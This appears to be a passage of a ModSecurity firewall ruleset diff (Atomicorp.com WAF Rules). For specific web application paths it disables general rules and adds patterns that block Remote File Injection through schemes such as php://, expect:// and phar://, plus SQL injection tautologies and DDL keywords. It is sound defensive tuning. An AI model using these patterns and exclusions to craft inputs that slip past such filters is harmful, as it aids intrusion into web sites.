+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^content_/|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340561,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editcontent.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^content_/|!ARGS:/link/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340562,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editcontent.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91129
+
+SecRule REQUEST_FILENAME "/html2rss/rss\.aspx" "phase:2,id:91130,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91131,t:none,pass,nolog,skipAfter:END_RULES_91131"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:U "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340563,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/html2rss/rss.aspx)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:U "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340564,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/html2rss/rss.aspx)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91131
+
+SecRule REQUEST_FILENAME "/winnder_step2\.1\.php" "phase:2,id:91132,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91133,t:none,pass,nolog,skipAfter:END_RULES_91133"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:rules|!ARGS:terms "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340565,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS ( /winnder_step2.1.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:rules|!ARGS:terms "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340566,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS ( /winnder_step2.1.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91133
+
+SecRule REQUEST_FILENAME "/contact/website\.php" "phase:2,id:91134,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91135,t:none,pass,nolog,skipAfter:END_RULES_91135"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:txtComments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340567,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact/website.php )',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:txtComments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340568,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/contact/website.php )',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91135
+
+SecRule REQUEST_FILENAME "/acp/template\.php" "phase:2,id:91136,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91137,t:none,pass,nolog,skipAfter:END_RULES_91137"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340569,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wbb/acp/template.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340570,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wbb/acp/template.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91137
+
+SecRule REQUEST_FILENAME "/sregister2-p\.php" "phase:2,id:91138,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019"
+SecAction "phase:2,id:91139,t:none,pass,nolog,skipAfter:END_RULES_91139"
+
+
+SecRule ARGS|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:skills "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:346144,rev:12,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/sregister2-p.php)',deny,log,auditlog,status:403,phase:2"
+
+SecMarker END_RULES_91139
+
+SecRule REQUEST_FILENAME "/posting\.php" "phase:2,id:91140,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=390711"
+SecAction "phase:2,id:91141,t:none,pass,nolog,skipAfter:END_RULES_91141"
+
+SecRule ARGS|ARGS_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:/message/|!ARGS:/post/|!ARGS:/body/|!ARGS:/msg/|!ARGS:/text/|!ARGS:/txt/|!ARGS:topicseen|!ARGS_NAMES:posted_data[product_substring] "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" "id:344156,capture,t:none,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection (/posting.php)',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
+
+SecMarker END_RULES_91141
+
+SecRule REQUEST_FILENAME "/phpmysupport/trackerimage\.php" "phase:2,id:91142,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91143,t:none,pass,nolog,skipAfter:END_RULES_91143"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:base "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340571,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/phpmysupport/trackerimage.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:base "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340572,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/phpmysupport/trackerimage.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91143
+
+SecRule REQUEST_FILENAME "/chat\.php" "phase:2,id:91144,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91145,t:none,pass,nolog,skipAfter:END_RULES_91145"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dep|!ARGS:protocol "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340573,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/chat.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:prfl|!ARGS:prtcl|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dep|!ARGS:protocol|!ARGS:psswrd "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340574,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/chat.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91145
+
+SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:91146,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=390707,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91147,t:none,pass,nolog,skipAfter:END_RULES_91147"
+
+#SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:wpau-ftphost|!ARGS:adsensem-code|!ARGS:addresses|!ARGS:referredby|!ARGS:adrotate_bannercode "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340575,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wp-admin/edit.php)'"
+#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+#SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:wpau-ftphost|!ARGS:adsensem-code|!ARGS:addresses|!ARGS:referredby|!ARGS:adrotate_bannercode "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340576,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/wp-admin/edit.php)'"
+#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91147
+
+SecRule REQUEST_FILENAME "/egroupware/etemplate/process_exec\.php" "phase:2,id:91148,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91149,t:none,pass,nolog,skipAfter:END_RULES_91149"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:exec[text]|!ARGS:/link/|!ARGS:/referer/|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340577,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/egroupware/etemplate/process_exec.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:exec[text]|!ARGS:/link/|!ARGS:/referer/|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340578,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/egroupware/etemplate/process_exec.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91149
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:91150,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340852,ctl:ruleRemovebyID=340853,ctl:ruleRemovebyID=340854,ctl:ruleRemovebyID=341057,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/acollab/install/install\.php" "phase:2,id:91151,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91152,t:none,pass,nolog,skipAfter:END_RULES_91152"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:upload_dir "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340581,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/acollab/install/install.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:upload_dir "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340582,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/acollab/install/install.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91152
+
+SecRule REQUEST_FILENAME "/includes/popup\.php" "phase:2,id:91153,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91154,t:none,pass,nolog,skipAfter:END_RULES_91154"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:z "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340583,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/includes/popup.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:z "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340584,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/includes/popup.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91154
+
+SecRule REQUEST_FILENAME "/cgi-bin/cgiemail/testform\.txt" "phase:2,id:91155,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91156,t:none,pass,nolog,skipAfter:END_RULES_91156"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:success "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340585,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/cgiemail/testform.txt)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:success "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340586,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/cgiemail/testform.txt)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91156
+
+SecRule REQUEST_FILENAME "/admin/doeditboard\.php" "phase:2,id:91157,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91158,t:none,pass,nolog,skipAfter:END_RULES_91158"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:headerfile|!ARGS:intro_body "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340587,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/doeditboard.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:headerfile|!ARGS:intro_body "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340588,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/ubbthreads/admin/doeditboard.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91158
+
+SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:91159,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91160,t:none,pass,nolog,skipAfter:END_RULES_91160"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pictureremote "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340589,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/anyinventory/admin/item_processor.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pictureremote "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340590,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/anyinventory/admin/item_processor.php)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91160
+
+SecRule REQUEST_FILENAME "/modules/fckeditor/fckeditor/editor/filemanager/browser/default/browser\.html" "phase:2,id:91161,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91162,t:none,pass,nolog,skipAfter:END_RULES_91162"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340591,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/default/browser.html)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340592,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/default/browser.html)',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91162
+
+SecRule REQUEST_FILENAME "/modules/mod_shoutbox\.php" "phase:2,id:91163,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91164,t:none,pass,nolog,skipAfter:END_RULES_91164"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:c|!ARGS:metodista "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:341592,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:c|!ARGS:metodista "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340593,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91164
+
+SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:91165,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=380026"
+
